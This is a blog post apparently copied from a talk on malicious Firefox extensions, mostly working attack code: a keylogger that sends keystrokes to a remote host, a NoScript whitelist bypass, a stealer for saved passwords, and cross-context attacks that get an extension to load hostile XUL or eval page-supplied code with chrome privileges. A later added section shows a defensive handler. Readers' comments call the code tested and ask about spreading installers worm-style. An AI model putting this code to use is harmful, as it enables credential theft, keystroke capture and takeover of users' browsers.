Thursday, April 14, 2011

Mozilla Firefox Strategies Mozilla Keylogger

Here are some of the highlights

Key Logger
We can create a simple keylogger by registering a keypress event listener that records every keystroke and then sends the buffer to a remote site with an XMLHttpRequest. The point to note here is that extensions are not bound by the same-origin policy, so an extension that records a password typed into your banking site can send it to a malicious site.
document.addEventListener("keypress", onkey, false);
var keys = '';
function onkey(e) {
  // Append each typed character to the buffer
  keys += String.fromCharCode(e.charCode);
  if (keys.length > 20) {
    // Chrome code is not bound by the same-origin policy, so the buffer can be
    // sent to any host; the destination was redacted in the original post
    var http = new XMLHttpRequest();
    var url = "http://***********.com/prasannak/ler****.php?keylog=" + keys + "\n";
    http.open("GET", url, false);
    http.send(null);
    keys = '';
  }
}

No-Script Bypass
We will use XPCOM classes and components to add a malicious site to the NoScript whitelist, which effectively renders NoScript's protection useless.

let Sub_btn = {
  onCommand: function(event) {
    // nsIPrefService gives chrome code read/write access to every preference,
    // including the branch that holds NoScript's whitelist
    var perfs = Components.classes["@mozilla.org/preferences-service;1"].
                  getService(Components.interfaces.nsIPrefService);
    perfs = perfs.getBranch("capability.policy.maonoscript.");
    perfs.setCharPref("sites", "default noscript whitelisted sites + -iblocked.com");
  }
};

Password Stealer
We will use XPCOM classes and components to build a stealer for the passwords Firefox has stored. Code:

let HelloWorld = {
  onCommand: function(event) {
    // nsILoginManager hands every saved login, password included, to chrome code
    var l2m = Components.classes["@mozilla.org/login-manager;1"].
                  getService(Components.interfaces.nsILoginManager);
    var alltheinfo = l2m.getAllLogins({});
    for (var i = 0; i < alltheinfo.length; i = i + 1) {
      alert(alltheinfo[i].password);
    }
  }
};

These were some sample malicious scripts, written using only basic, legitimate functions approved by Mozilla, that produce very malicious extensions. Malicious extensions are limited only by the imagination of their creator.

Cross Context Switching (XCS)
The attack (XCS) was first found by "pdp", against an extension called Sage. XCS is the concept of moving malicious code from one realm to another, for example code in a web page being executed by a resident extension. The major harm of such an attack is that a user can be compromised just by visiting a web location.

Attacking DOM & Event Handlers
Event handlers implement the properties, attributes and behavior of an element. When a DOM element is dragged and dropped, it takes its attributes, properties and behavior with it. This could be used maliciously if extension code trusted the code carried by a dropped malicious DOM element.

createEvent() could be used to send custom events, which can also reach the extension itself. In this example we will create an extension that listens for custom events and performs some activity, such as loading a dynamic XUL overlay.

This could be exploited by a malicious user by luring the user to a page he controls, whose code creates a custom event carrying the location of a malicious XUL file hosted by him.

On receiving the event, the extension loads the malicious XUL from an arbitrary location, and as the XUL file now runs as part of chrome it is free to do any malicious activity like the ones discussed in the previous section, "Malicious Extensions".

As of Firefox version 3.5 the "loadOverlay" function does not accept "http" based XUL requests but does allow XUL from "chrome://". Though this fixes the problem of a malicious user loading malicious content from the internet, the threat of loading malicious XUL from a mapped drive still exists.

Extension XUL Code

<script>
  var customExtension = {
    customListener: function(evt) {
      // Loads whatever URL the (untrusted) event target carries as a chrome overlay
      document.loadOverlay(evt.target.getAttribute("url"), null);
    }
  };
  // The fourth argument (wantsUntrusted = true) lets events dispatched by web
  // content reach this chrome listener, which by default only receives trusted events
  document.addEventListener("CustomEvent", function(e) {
    customExtension.customListener(e); }, false, true);
</script>

Malicious Web Location Code

<html>
<head>
<title>Test</title>
<script>
// The element carries the overlay location; the extension reads it back via getAttribute("url")
var element = document.createElement("CustomExtensionDataElement");
element.setAttribute("url", "chrome://hellooworld/content/q1.xul");
document.documentElement.appendChild(element);
// Dispatch the custom event the extension listens for; it bubbles up to the chrome listener
var evt = document.createEvent("Events");
evt.initEvent("CustomEvent", true, false);
element.dispatchEvent(evt);
</script>
</head>
<body>
<p>
This Test Page </p>
</body>
</html>

Bypassing Wrappers
Multiple wrappers exist within the Mozilla framework that act as firewalls, segregating code from different zones. A developer could, for ease of use, bypass these firewalls, exposing the Firefox ecosystem to XCS attacks.

We will create a Firefox extension that bypasses such a wrapper using "wrappedJSObject" to access variables in the document zone and use that content in the privileged chrome zone. The extension developer also uses another potentially dangerous function, "eval()": he grabs content from the document and runs it through eval() in the chrome zone, which allows a malicious user to inject JavaScript code that eval executes with chrome privileges.
Code:

Extension Code

function Test_Function()
{
    // Through the wrapper, globals defined by web content are not visible to chrome code
    var test = window.content.my_message1;
    if (test == null)
    {
      alert("Wrapper Exists");
    }
    else {
      alert(test);
      // wrappedJSObject strips the wrapper and exposes the raw content-defined variable,
      // which is then executed with chrome privileges
      var trim = window.content.wrappedJSObject.my_message1;
      eval(trim);
    }
}

Malicious Website Code

<html>
<head>
<title>Test</title>
<script>
var dir = "123";
// The string the extension will eval() in the chrome zone: it queries the directory
// service for the user's home folder, something web content alone could never reach
my_message1 = "dirService = Components.classes['@mozilla.org/file/directory_service;1'].getService(Components.interfaces.nsIProperties); " +
              "homeDirFile = dirService.get('Home', Components.interfaces.nsIFile); " +
              "homeDir = homeDirFile.path; " +
              "alert(homeDir);";
</script>
</head>
<body>
<p>
This Test Page </p>
</body>
</html>
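As an added example that is not part of the original post, this is how a chrome-side handler could take the custom event from the XCS section and the content-supplied string from the wrapper section without calling loadOverlay() on an arbitrary URL or eval() on content data: the message is parsed as JSON, dispatched to a fixed handler table, and the overlay URL is checked against the extension's own chrome:// package. The function names, the "hellooworld" package allowlist and the message format are assumptions; the code is plain JavaScript and runs in Node.

```javascript
// Chrome-side handler that treats everything coming from web content as data.
// Function names, the "hellooworld" package allowlist and the message format are
// assumptions made for this example; Firefox calls are only named in comments.

const ALLOWED_CHROME_PACKAGES = new Set(["hellooworld"]);  // this extension's own package

// An overlay may only be loaded from this extension's own chrome:// package,
// from its content/ directory, with a plain file name. This rejects http://,
// file:// (mapped drives), other chrome packages, percent-encoding and ".." traversal.
function isAllowedOverlayUrl(raw) {
  if (typeof raw !== "string" || raw.length > 2048) return false;
  let url;
  try { url = new URL(raw); } catch (e) { return false; }
  if (url.protocol !== "chrome:") return false;
  if (!ALLOWED_CHROME_PACKAGES.has(url.hostname)) return false;
  if (url.username || url.password || url.port || url.search || url.hash) return false;
  return /^\/content\/[A-Za-z0-9_-]+\.xul$/.test(url.pathname);
}

// Fixed table of actions content may request. Nothing from the message is executed;
// the message only selects a handler and supplies parameters that are validated.
const HANDLERS = {
  loadOverlay(msg) {
    if (!isAllowedOverlayUrl(msg.url)) return { ok: false, reason: "url rejected" };
    // In the real extension, document.loadOverlay(msg.url, null) would be called here.
    return { ok: true, action: "loadOverlay", url: msg.url };
  },
};

// raw is the string read from the event target's attribute (XCS section) or from
// the content window (wrapper section). It is parsed as JSON and never eval()'d.
function handleContentMessage(raw) {
  if (typeof raw !== "string" || raw.length > 4096) return { ok: false, reason: "bad input" };
  let msg;
  try { msg = JSON.parse(raw); } catch (e) { return { ok: false, reason: "not json" }; }
  if (msg === null || typeof msg !== "object" || Array.isArray(msg)) return { ok: false, reason: "not an object" };
  if (!Object.prototype.hasOwnProperty.call(HANDLERS, msg.type)) return { ok: false, reason: "unknown type" };
  return HANDLERS[msg.type](msg);
}

// Constructed sample inputs: a legitimate request and the kind of string the
// vulnerable extension above would have passed straight to eval().
const GOOD = JSON.stringify({ type: "loadOverlay", url: "chrome://hellooworld/content/q1.xul" });
const BAD = "eval(dirService = Components.classes['@mozilla.org/file/directory_service;1'])";
console.log(handleContentMessage(GOOD));  // { ok: true, action: 'loadOverlay', url: ... }
console.log(handleContentMessage(BAD));   // { ok: false, reason: 'not json' }
```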
5 comments for "Mozilla Firefox Strategies Mozilla Keylogger"

  1. Awesome post, man. I found this concept very useful. Tested and working. Apart from this, I'd like to ask you: have you worked on BHO?
    BHO may help in spreading our installer or a message like Samy (Samy's worm is not on BHO) did.

  2. Copied from
    Mozilla Firefox Internals, Building Extensions & Attack Strategies
    Prasanna Kanagasabai

    At least give credit.